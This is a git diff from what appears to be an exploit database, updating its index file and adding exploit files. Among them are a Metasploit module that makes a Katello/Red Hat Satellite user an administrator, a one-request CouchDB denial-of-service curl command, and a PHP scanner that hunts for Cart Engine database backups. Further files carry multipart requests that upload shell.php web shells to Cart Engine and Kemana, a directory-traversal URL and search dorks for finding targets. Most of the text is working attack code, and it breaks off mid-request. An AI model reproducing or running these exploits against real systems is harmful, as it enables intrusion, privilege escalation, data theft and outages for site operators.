diff --git a/files.csv b/files.csv index 96a88afdf..bd42a00c6 100755 --- a/files.csv +++ b/files.csv @@ -21086,7 +21086,7 @@ id,file,description,date,author,platform,type,port 23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0 -23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 +23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation Vulnerability",2004-03-31,http-equiv,windows,remote,0 23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 @@ -29263,3 +29263,31 @@ id,file,description,date,author,platform,type,port 32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0 32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 +32501,platforms/multiple/local/32501.txt,"NXP Semiconductors MIFARE Classic Smartcard - Multiple Security Weaknesses",2008-10-21,"Flavio D. Garcia",multiple,local,0 +32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 +32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 +32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 +32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 +32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 +32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability",2014-03-25,LiquidWorm,php,webapps,0 +32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 +32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0 +32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 (.m3u, .pls, .asx) - Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 +32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,metasploit,linux,remote,443 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php, i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32518,platforms/windows/remote/32518.txt,"Google Chrome 0.2.149 ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 +32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids DoS Exploit",2014-03-26,"Krusty Hack",multiple,dos,0 +32520,platforms/php/webapps/32520.txt,"OpenCart <= 1.5.6.1 - (openbay) Multiple SQL Injection",2014-03-26,"Saadi Siddiqui",php,webapps,0 +32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 'ListRecords.php' Multiple Remote File Include Vulnerabilities",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 +32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0 +32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 'api.php' URI Redirection Vulnerability",2008-10-23,xuanmumu,php,webapps,0 +32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 'announcements.php' SQL Injection Vulnerability",2008-10-23,xuanmumu,php,webapps,0 +32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 'liste' Parameter Cross Site Scripting Vulnerability",2008-10-23,"Omer Singer",php,webapps,0 +32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 'fullscreen.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 +32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 'html-tidy-logic.php' Cross Site Scripting Vulnerability",2008-10-23,ShockShadow,php,webapps,0 +32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 'pg' Parameter Cross-Site Scripting Vulnerability",2008-10-24,"Ghost Hacker",php,webapps,0 diff --git a/platforms/linux/remote/32515.rb b/platforms/linux/remote/32515.rb new file mode 100755 index 000000000..4c5c2fb3a --- /dev/null +++ b/platforms/linux/remote/32515.rb @@ -0,0 +1,147 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize + super( + 'Name' => 'Katello (Red Hat Satellite) users/update_roles Missing Authorization', + 'Description' => %q{ + This module exploits a missing authorization vulnerability in the + "update_roles" action of "users" controller of Katello and Red Hat Satellite + (Katello 1.5.0-14 and earlier) by changing the specified account to an + administrator account. + }, + 'Author' => 'Ramon de C Valle', + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-2143'], + ['CWE', '862'] + ], + 'DisclosureDate' => 'Mar 24 2014' + ) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Your username']), + OptString.new('PASSWORD', [true, 'Your password']), + OptString.new('TARGETURI', [ true, 'The path to the application', '/']), + ], self.class + ) + end + + def run + print_status("Logging into #{target_url}...") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'user_session', 'new'), + 'vars_get' => { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + print_status('Retrieving the CSRF token for this session...') + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'dashboard') + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Authentication failed') + return + else + session = $1 if res.get_cookies =~ /_katello_session=(\S*);/ + + if session.nil? + print_error('Failed to retrieve the current session') + return + end + end + + if res.headers['Location'] =~ /user_session\/new$/ + print_error('Failed to retrieve the user id') + return + else + csrf_token = $1 if res.body =~ //i + csrf_token = $1 if res.body =~ //i if csrf_token.nil? + + if csrf_token.nil? + print_error('Failed to retrieve the CSRF token') + return + end + + user = $1 if res.body =~ /\/users.(\d+)#list_search=#{datastore['USERNAME']}/ + + if user.nil? + print_error('Failed to retrieve the user id') + return + end + end + + print_status("Sending update-user request to #{target_url('users', user, 'update_roles')}...") + res = send_request_cgi( + 'cookie' => "_katello_session=#{session}", + 'headers' => { + 'X-CSRF-Token' => csrf_token + }, + 'method' => 'PUT', + 'uri' => normalize_uri(target_uri.path, 'users', user, 'update_roles'), + 'vars_post' => { + 'user[role_ids][]' => '1' + } + ) + + if res.nil? + print_error('No response from remote host') + return + end + + if res.headers['X-Message-Type'] =~ /success$/ + print_good('User updated successfully') + else + print_error('Failed to update user') + end + end + + def target_url(*args) + (ssl ? 'https' : 'http') + + if rport.to_i == 80 || rport.to_i == 443 + "://#{vhost}" + else + "://#{vhost}:#{rport}" + end + normalize_uri(target_uri.path, *args) + end +end \ No newline at end of file diff --git a/platforms/multiple/dos/32519.txt b/platforms/multiple/dos/32519.txt new file mode 100755 index 000000000..abe34f8ce --- /dev/null +++ b/platforms/multiple/dos/32519.txt @@ -0,0 +1,16 @@ +# Exploit Title: Couchdb uuids DOS exploit +# Google Dork inurl: _uuids +# Date: 03/24/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://couchdb.apache.org/ +# Software Link: http://couchdb.apache.org/ +# Version: up to 1.5.0 +# Tested on: Linux Couchdb up to 1.5.0 + +HOW TO +====== +curl http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999 + +TEST +==== +Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request. \ No newline at end of file diff --git a/platforms/multiple/local/32501.txt b/platforms/multiple/local/32501.txt new file mode 100755 index 000000000..7b4cdb98d --- /dev/null +++ b/platforms/multiple/local/32501.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/31853/info + +MIFARE Classic is prone to multiple security weaknesses: + +1. A security weakness may allow attackers to recover the internal state of the linear feedback shift register. + +2. A security weakness may allow attackers to recover the previous state of the linear feedback shift register. + +3. A security weakness may allow attackers to invert the filter function and potentially gain access to the private key. + +4. A security weakness may allow attackers to reduce the search space for tag nonces. + +Exploiting these issues in combination may allow attackers to gain access to the smartcard's secret key. Successful exploits will allow attackers with physical access to an RFID reader to bypass certain physical security restrictions. + +http://www.exploit-db.com/sploits/32501.tgz \ No newline at end of file diff --git a/platforms/php/webapps/32502.txt b/platforms/php/webapps/32502.txt new file mode 100755 index 000000000..84a2f6506 --- /dev/null +++ b/platforms/php/webapps/32502.txt @@ -0,0 +1,56 @@ +# Exploit Title: etSimple CMS v3.3.1 Persistent Cross Site Scripting + +# Google Dork: N/A + +# Date: 24-03-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://get-simple.info/ + +# Software Link: http://get-simple.info/download/ + +# Version: v3.3.1 + +# Tested on: N/A + +# CVE : N/A + +# + +## Description: + +# + +# In the administrative interface, the users can change their personal +settings. The parameters "name" and + +# "permalink" do not properly sanitize its input and allows malicious code +to be stored in the XML file. + +# + +## PoC: + +# Admin"> + +# http://url/admin/settings.php + +# + +# + +# The following parameters are vulnerable: + +# + +# 1. Permalink + +# 2. Name + +# + +# + +# More information can be found at: +http://www.nerdbox.it/getsimple-cms-v3-3-1-vulnerabilities/ \ No newline at end of file diff --git a/platforms/php/webapps/32503.txt b/platforms/php/webapps/32503.txt new file mode 100755 index 000000000..da5282064 --- /dev/null +++ b/platforms/php/webapps/32503.txt @@ -0,0 +1,350 @@ +? +Cart Engine 3.0.0 Remote Code Execution + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated arbitrary code +execution. The vulnerability is caused due to the improper verification +of uploaded files in several modules thru several POST parameters. +This can be exploited to execute arbitrary PHP code by uploading +a malicious PHP script file that will be stored in '/public/image' +directory. Minimum permissions needed for a user to upload any file: + +User level: Regular (param: user_level=1) +Admin level: Editor (param: admin_level=3) + +Only the 'Super Admin' level makes the Tool 'File Manager' available. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5182 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5182.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + + #1 (Modules > qBanner > Manage Banner > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1 + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------225222869427624 +Content-Disposition: form-data; name="group_id" + +QBANR +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_body" + +This page is part of qBanner module. Please use qBanner Manager to edit this page. +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_list" + +-----------------------------225222869427624-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #2 (Tools > File Manager > Upload) + +POST http://localhost/ce3_0/admin/fman/upload_process.php HTTP/1.1 + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="chdir" + +-----------------------------76802486520945 +Content-Disposition: form-data; name="n" + +5 +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_1"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_2"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_3"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_4"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945 +Content-Disposition: form-data; name="userfile_5"; filename="" +Content-Type: application/octet-stream + +-----------------------------76802486520945-- + + +Upload location: Anywhere within the webroot folder and its subfolders. +Exec: http://localhost/ce3_0/shell.php?cmd=whoami + + + + + #3 (Modules > Slideshow > Manage Slides > Add Entry) + +POST http://localhost/ce3_0/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1 + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------23201806221528 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------23201806221528 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_title" + +ZSL +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_keyword" + +http://www.zeroscience.mk +-----------------------------23201806221528 +Content-Disposition: form-data; name="group_id" + +SSHOW +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_body" + +This page is part of SlideShow module. Please use SlideShow Manager to edit this page. +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_allow_comment" + +-----------------------------23201806221528 +Content-Disposition: form-data; name="page_list" + +-----------------------------23201806221528-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #4 (Contents > Manage Categories > Add Entry) + +POST http://localhost/ce3_0/admin/page_cat.php? HTTP/1.1 + + +-----------------------------205172563220150 +Content-Disposition: form-data; name="AXSRF_token" + +3afa0c7483889ac54d7b6afa4083a9a2 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------205172563220150 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------205172563220150 +Content-Disposition: form-data; name="group_id" + +GENPG +-----------------------------205172563220150 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------205172563220150 +Content-Disposition: form-data; name="permalink" + +-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_details" + +

Zero Science Lab

+-----------------------------205172563220150 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------205172563220150-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami + + + + + #5 (Products > Category > Add Entry) + +POST http://localhost/ce3_0/admin/product_cat.php? HTTP/1.1 + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="AXSRF_token" + +c3d8ccc82a75bb49d7698b6ed27fd016 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_key" + +idx +-----------------------------137423069119287 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------137423069119287 +Content-Disposition: form-data; name="parent_id" + +1 +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------137423069119287 +Content-Disposition: form-data; name="permalink" + +zsl +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_details" + +

CategoryDesc

+-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_keywords" + +Zero Science Lab +-----------------------------137423069119287 +Content-Disposition: form-data; name="cat_featured" + +-----------------------------137423069119287-- + + +Upload location: http://localhost/ce3_0/public/image/ +Exec: http://localhost/ce3_0/public/image/shell.php?cmd=whoami diff --git a/platforms/php/webapps/32504.txt b/platforms/php/webapps/32504.txt new file mode 100755 index 000000000..409a24f77 --- /dev/null +++ b/platforms/php/webapps/32504.txt @@ -0,0 +1,49 @@ +? +Cart Engine 3.0.0 (task.php) Local File Inclusion Vulnerability + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 3.0.0 + +Summary: Open your own online shop today with Cart Engine! The +small, yet powerful and don't forget, FREE shopping cart based +on PHP & MySQL. Unique features of Cart Engine include: CMS engine +based on our qEngine, product options, custom fields, digital +products, search engine friendly URL, user friendly administration +control panel, easy to use custom fields, module expandable, sub +products, unsurpassed flexibility...and more! + +Desc: Cart Engine suffers from an authenticated file inclusion +vulnerability (LFI) when input passed thru the 'run' parameter to +task.php is not properly verified before being used to include files. +This can be exploited to include files from local resources with +directory traversal attacks. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5181 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5181.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +http://localhost/ce3_0/admin/task.php?run=../../../../../../windows/win.ini diff --git a/platforms/php/webapps/32505.txt b/platforms/php/webapps/32505.txt new file mode 100755 index 000000000..06bd4b5bc --- /dev/null +++ b/platforms/php/webapps/32505.txt @@ -0,0 +1,179 @@ +? $total) return; + if(empty($start_time)) $start_time=time(); + + $now = time(); + $perc=(double)($done/$total); + $bar=floor($perc*$size); + + $disp=number_format($perc*100, 0); + + $status_bar="\r $disp% ["; + $status_bar.=str_repeat("=", $bar); + if($bar<$size) + { + $status_bar.=">"; + $status_bar.=str_repeat(" ", $size-$bar); + } else + { + $status_bar.="="; + } + + $status_bar.="] $done/$total"; + + $rate = ($now-$start_time)/$done; + $left = $total - $done; + $eta = round($rate * $left, 2); + $elapsed = $now - $start_time; + + $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; + + echo "$status_bar "; + flush(); + + if($done == $total) + { + echo "\n"; + } +} + +print " + @---------------------------------------------------------------@ + | | + | Cart Engine 3.0.0 Database Backup Disclosure Exploit | + | | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + | Advisory ID: ZSL-2014-5180 | + | www.zeroscience.mk | + | | + @---------------------------------------------------------------@ + "; + +if ($argc < 4) +{ + print "\n\n [+] Usage: php $argv[0] \n\n"; + print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n"; + die(); +} + +$godina_array = array('2014','2013','2012','2011','2010'); + +$mesec_array = array('12','11','10','09', + '08','07','06','05', + '04','03','02','01'); + +$dn_array = array('31','30','29','28','27','26', + '25','24','23','22','21','20', + '19','18','17','16','15','14', + '13','12','11','10','09','08', + '07','06','05','04','03','02', + '01'); + +$host = $argv[1]; +$port = intval($argv[2]); +$path = $argv[3]; +$dbnm = "Full%20Backup%20"; + +$alert1 = "\033[1;31m"; +$alert2 = "\033[0;37m"; +$alert3 = "\033[1;32m"; + +echo "\n [*] Running checks:\n\n"; + +foreach($godina_array as $godina) +{ + foreach($mesec_array as $mesec) + { + $x++; + status($x, 58); + foreach($dn_array as $dn) + { + $ext=".gz"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); + } + $ext=".sql"; + if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) + { + echo "\n"; + echo $alert1; + print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; + echo $alert2; + print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; + print " Full URL:\x20"; + echo $alert3; + die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); + } + } + } +} + +print "\n\n [*] Zero findings!\n\n\n"; + +?> diff --git a/platforms/php/webapps/32506.txt b/platforms/php/webapps/32506.txt new file mode 100755 index 000000000..9ba9a4e5b --- /dev/null +++ b/platforms/php/webapps/32506.txt @@ -0,0 +1,53 @@ +? +Kemana Directory 1.5.6 kemana_admin_passwd Cookie User Password Hash Disclosure + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 1.5.6 + +Summary: Experience the ultimate directory script solution +with Kemana. Create your own Yahoo or Dmoz easily with Kemana. +Unique Kemana's features including: CMS engine based on our +qEngine, multiple directories support, user friendly administration +control panel, easy to use custom fields, unsurpassed flexibility. + +Desc: Kemana contains a flaw that is due to the 'kemana_admin_passwd' +cookie storing user password SHA1 hashes. This may allow a remote MitM +attacker to more easily gain access to password information. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5179 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5179.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + +GET /kemana/admin/rev_report.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/kemana/admin/link.php +Cookie: qvc_value=4e520fb7e28ff76d71800f4329633bc12040101c; kemana_user_id=guest%2Acbb77d83775796bc42f94a97f9905a0d; kemana_admin_id=admin; kemana_admin_passwd=d033e22ae348aeb5660fc2140aec35850c4da997 +Connection: keep-alive diff --git a/platforms/php/webapps/32507.txt b/platforms/php/webapps/32507.txt new file mode 100755 index 000000000..5125aa17c --- /dev/null +++ b/platforms/php/webapps/32507.txt @@ -0,0 +1,261 @@ +? +Kemana Directory 1.5.6 Remote Code Execution + + +Vendor: C97net +Product web page: http://www.c97.net +Affected version: 1.5.6 + +Summary: Experience the ultimate directory script solution +with Kemana. Create your own Yahoo or Dmoz easily with Kemana. +Unique Kemana's features including: CMS engine based on our +qEngine, multiple directories support, user friendly administration +control panel, easy to use custom fields, unsurpassed flexibility. + +Desc: Kemana Directory suffers from an authenticated arbitrary code +execution. The vulnerability is caused due to the improper verification +of uploaded files in several modules thru several POST parameters. +This can be exploited to execute arbitrary PHP code by uploading +a malicious PHP script file that will be stored in '/public/image' +directory. Minimum permissions needed for a user to upload any file: + +User level: Regular (param: user_level=1) +Admin level: Editor (param: admin_level=3) + +Only the 'Super Admin' level makes the Tool 'File Manager' available. + + +Tested on: Apache/2.4.7 (Win32) + PHP/5.5.6 + MySQL 5.6.14 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5178 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5178.php + + +Dork #1: intitle:powered by c97.net +Dork #2: intitle:powered by qEngine +Dork #3: intitle:powered by Kemana.c97.net +Dork #4: intitle:powered by Cart2.c97.net + + + +07.03.2014 + +--- + + + #1 (Modules > Articles > Manage Categories > Create A New Category) + +POST http://localhost/kemana/admin/task.php?mod=portal&run=pcat_edit.php& HTTP/1.1 + + +-----------------------------18727540915953 +Content-Disposition: form-data; name="AXSRF_token" + +12adff6127dfa3355ac24bad4a4c8687 +-----------------------------18727540915953 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------18727540915953 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------18727540915953 +Content-Disposition: form-data; name="primary_key" + +cat_id +-----------------------------18727540915953 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------18727540915953 +Content-Disposition: form-data; name="parent" + +0 +-----------------------------18727540915953 +Content-Disposition: form-data; name="cat_name" + +ZSL +-----------------------------18727540915953 +Content-Disposition: form-data; name="cat_note" + +nothing to note +-----------------------------18727540915953 +Content-Disposition: form-data; name="cat_keywords" + +Zero Science Lab +-----------------------------18727540915953 +Content-Disposition: form-data; name="cat_img"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------18727540915953-- + + +Upload location: http://localhost/kemana/public/image/ +Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami + + + + + #2 (Modules > qBanner > Manage Banner > Add Entry) + +POST http://localhost/kemana/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1 + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="AXSRF_token" + +52e9c9ff9bb251a144b82a662496f5b8 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_cmd" + +new +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_process" + +1 +-----------------------------225222869427624 +Content-Disposition: form-data; name="qadmin_savenew" + +0 +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_key" + +page_id +-----------------------------225222869427624 +Content-Disposition: form-data; name="primary_val" + +dummy +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_image"; filename="shell.php" +Content-Type: application/octet-stream + + +-----------------------------225222869427624 +Content-Disposition: form-data; name="page_title" + 